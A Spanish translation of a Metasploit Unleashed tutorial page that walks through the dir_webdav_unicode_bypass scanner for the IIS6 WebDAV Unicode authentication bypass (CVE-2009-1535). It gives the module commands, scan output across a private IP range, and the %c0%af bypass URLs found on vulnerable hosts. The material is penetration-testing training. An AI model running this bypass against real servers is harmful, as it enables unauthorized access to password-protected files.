Http/dir webdav unicode bypass

De www.metasploit-es.com.ar

El modulo "dir_webdav_unicode_bypass" escanea un rango de servidores web e intenta puentear la autenticacion utilizando la vulnerabilidad WebDAV IIS6 Unicode (http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1535). 

msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(dir_webdav_unicode_bypass) > show options

Module options:

   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   DICTIONARY  /opt/metasploit3/msf3/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   ERROR_CODE  404                                            yes       Error code for non existent directory
   HTTP404S    /opt/metasploit3/msf3/data/wmap/wmap_404s.txt  no        Path of 404 signatures to use
   PATH        /                                              yes       The path to identify files
   Proxies                                                    no        Use a proxy chain
   RHOSTS                                                     yes       The target address range or CIDR identifier
   RPORT       80                                             yes       The target port
   THREADS     1                                              yes       The number of concurrent threads
   VHOST                                                      no        HTTP server virtual host

Mantendremos los parametros por defecto DICTIONARY y HTTP404S, definiremos nuestros valores RHOSTS y THREADS y ejecutaremos el modulo. 

msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(dir_webdav_unicode_bypass) > set THREADS 20
THREADS => 20
msf auxiliary(dir_webdav_unicode_bypass) > run

[*] Using code '404' as not found.
[*] Using code '404' as not found.
[*] Using code '404' as not found.
[*] Found protected folder http://192.168.1.211:80/admin/ 401 (192.168.1.211)
[*] 	Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.223:80/phpmyadmin/ 401 (192.168.1.223)
[*] 	Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.223:80/security/ 401 (192.168.1.223)
[*] 	Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.204:80/printers/ 401 (192.168.1.204)
[*] 	Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] 	Found vulnerable WebDAV Unicode bypass target http://192.168.1.204:80/%c0%afprinters/ 207 (192.168.1.204)
[*] Found protected folder http://192.168.1.203:80/printers/ 401 (192.168.1.203)
[*] 	Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] 	Found vulnerable WebDAV Unicode bypass target http://192.168.1.203:80/%c0%afprinters/ 207 (192.168.1.203)
...snip...
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_webdav_unicode_bypass) >

Nuestro escaneo ha encontrado servidores vulnerables. Esta vulnerabilidad puede permitirnos potencialmente listar, descargar o incluso subir archivos a directorios protegidos con contraseña.



© Offensive Security 2009 

Original de www.offensive-security.com
Traducido por cbk999
Obtenido de «http://www.metasploit-es.com.ar/wiki/index.php/Http/dir_webdav_unicode_bypass»
Herramientas personales